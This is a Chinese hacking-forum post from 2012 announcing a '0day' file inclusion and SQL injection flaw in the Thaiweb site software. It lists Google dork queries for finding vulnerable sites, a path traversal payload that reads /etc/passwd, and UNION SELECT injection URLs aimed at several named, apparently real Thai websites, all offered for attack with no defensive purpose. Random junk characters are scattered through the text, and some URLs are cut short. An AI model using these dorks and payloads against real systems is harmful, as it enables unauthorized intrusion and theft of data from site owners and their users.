找回密码
 立即注册
查看: 3061|回复: 0
打印 上一主题 下一主题

Thaiweb远程文件sql注入漏洞0day

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-27 08:38:39 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
Google之:. `, D  I  Y+ o( V
: A3 j! I6 A& t) F6 o+ o0 m
intext:powered by Thaiweb
; ~  O, ^  L0 B) c8 s8 I) t& T* h! }) l6 D0 W9 _
inurl:index.php?page=board.php
" C9 R/ v7 r4 P+ H6 K! [# z* n' n( E/ e0 u+ V' D1 n

8 I# c) M' x. a, P3 R" t
8 s/ X- O. u1 l8 s6 F- R利用点1:http://www.xfack.com/index.php?p ... ../../../etc/passwd
: u) j7 Q& w( v( O
" A  W8 `% j: M. M8 k( X2 b  S
8 H6 w9 k  M/ j% k1 @
) y  N" X6 B% P4 N0 ]9 N; t利用点2:http://www.xfack.com/index.php?page=boardque.php&bod_id=4'
$ b2 Z( j$ k' G2 R
8 D5 I( z2 r4 Q; d5 _$ ], o
, m# q$ Q1 ?9 w8 j/ p
1 j6 l" K3 e: e+ Phttp://www.keytasin.com//index.p ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
6 Q0 b, U4 h; x* O+ I
: q. w9 L+ I9 S7 b, g0 ^. T6 uhttp://www.autopartnerthailand.c ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
+ i1 u/ K2 O, W( E+ H ; \' }& m0 [, Z
http://gift.in.th/index.php?page ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
4 q. ]4 u. q& Q; D& f. Q, _, `; M" L& B
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表